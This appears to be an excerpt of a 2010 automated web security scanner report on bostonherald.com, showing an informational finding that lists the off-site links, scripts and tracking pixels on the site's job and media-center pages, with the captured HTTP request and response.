       <a target="hotjobs" href="http://hotjobs.yahoo.com/create-resume" ylc="http://hotjobs.yahoo.com/create-resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/post_resume.gif" alt="Post Your Resume Now" style="border-width:0px;margin-left:10px;"/>
       </a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Accounting & Finance</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Clerical & Admin</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Healthcare</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Retail</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Sales</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Technology</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-search-category" ylc="http://hotjobs.yahoo.com/jobs-search-category;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">More Job Categories...</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB" style="color: rgb(0, 76, 202);">Search Resumes</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald" style="color: rgb(0, 76, 202);">Save with Starter Packs</a>
...[SNIP]...
<div style="padding-top: 5px;">HotJobs Customer? <a target="hotjobs" href="http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald" style="color: rgb(0, 76, 202); text-decoration: underline;">Sign In</a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://us.bc.yahoo.com/b?P=018URELEenI8gYLNKLm5uwaVzIkMMkzXvBgACUM7&T=17utvlsn4%2fX%3d1289206808%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d4019169743%2fH%3dc2VydmVJZD0iMDE4VVJFTEVlbkk4Z1lMTktMbTV1d2FWeklrTU1relh2QmdBQ1VNNyIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI4OTIwNjgwODYxMjA5NSIg%2fQ%3d-1%2fS%3d1%2fJ%3d237AC442"></noscript>
...[SNIP]...
<div style="position: relative; top: -70px; left: 275px; text-align: center; background-color: white; width: 150px; border: 1px solid #666;"><a href="http://bostonherald.boocoo.com"><img src="http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg" border="0" /></a></div>


            <a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime"><img src="http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif"></a>
...[SNIP]...
<div class="jobfindDivTop"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif" alt="Jobfind News Corner" /></div>
...[SNIP]...
</a>
        <a href="http://feeds.feedburner.com/bostonherald/jobfind/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif" alt="XML" /></a>
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/bd6cb2_olbermann11082010.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
<img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif" alt="Jobfind Featured Employers" />
</div>
...[SNIP]...
<a href="/jobfind/calendar/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindJobFairs.gif" alt="Jobfind Job Fairs" /></a>
...[SNIP]...
<br />
+&nbsp;<a class="LinksDarkRedNone" href="http://bh.heraldinteractive.com/jobfind/resume_edge/">Build the perfect resume now!</a>
...[SNIP]...
<div class="jobfindDivTop">
<a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif" alt="Jobfind Job Salary Wizard" /></a>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
<li><a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif" alt="Jobfind Job Salary Wizard"></a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivLeft">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp">Cost of Living Wizard</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp">Job Assessor</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp">College Tuition Planner</a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivRight">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp">How long until you make a million?</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp">Compare yourself to the power players</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp">Executive Compensation Wizard</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

8.14. http://bostonherald.com/mediacenter/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:26:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=445" type="text/javascript"></script>
...[SNIP]...
<![endif]-->


<link rel="alternate" title="Photos & Video - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/mediacenter/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://buyheraldphotos.com">Buy Herald Photos</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
ideo" name="media_type_video" value="1" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png" style="position:relative; top: 4px;" /> Video

&nbsp;

   <!--
<input type="submit" class="mediaTypeBtn " name="media_type" value="Audio" onclick="if($('media_type_audio').
...[SNIP]...
id="media_type_photo" name="media_type_photo" value="0" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png" style="position:relative; top: 4px;" /> Photo

&nbsp;

</div>
...[SNIP]...
<div id="navPaneOverlay" ><img class="ajax_loader" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif" /></div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay0" class="nowPlayingOverlay" width="40" style=" display: block; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay1" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay2" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay3" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay4" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay5" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay6" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay7" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay8" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay9" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay10" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay11" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay12" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay13" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay14" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay15" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay16" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay17" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay18" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay19" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay20" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay21" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4516','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/d23c70_110610weddingmg02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Thief makes escape in wedding limo"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Thief makes escape in wedding limo">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 Mass. election"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 Mass. election">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4511','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101105/stp/016900_Graf1_11052010.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4502','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101104/stp/033e68_110310curtistf05.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4500','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101103/stp/9ba709_110310explomg02.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\House explodes in Hyde Park"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\House explodes in Hyde Park">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4498','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/a51bdb_110210stabmg04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4497','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/5d2015_110210bakernl04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\The candidates vote on election morning"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\The candidates vote on election morning">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4496','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/191160_110110bakertf07.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidates prepare for Election Day"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidates prepare for Election Day">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4493','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14312b_103110Patrick02jm.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Last days on the campaign trail"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Last days on the campaign trail">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4491','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/41db8f_103010bakertf04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov candidates around town"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov candidates around town">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4489','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/3f8e6e_103010keatingkm20.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Keating rallies support"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Keating rallies support">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4485','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/708e7d_102910henryce007.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4471','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/58f01a_102310devalfn01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov. race"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov. race">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
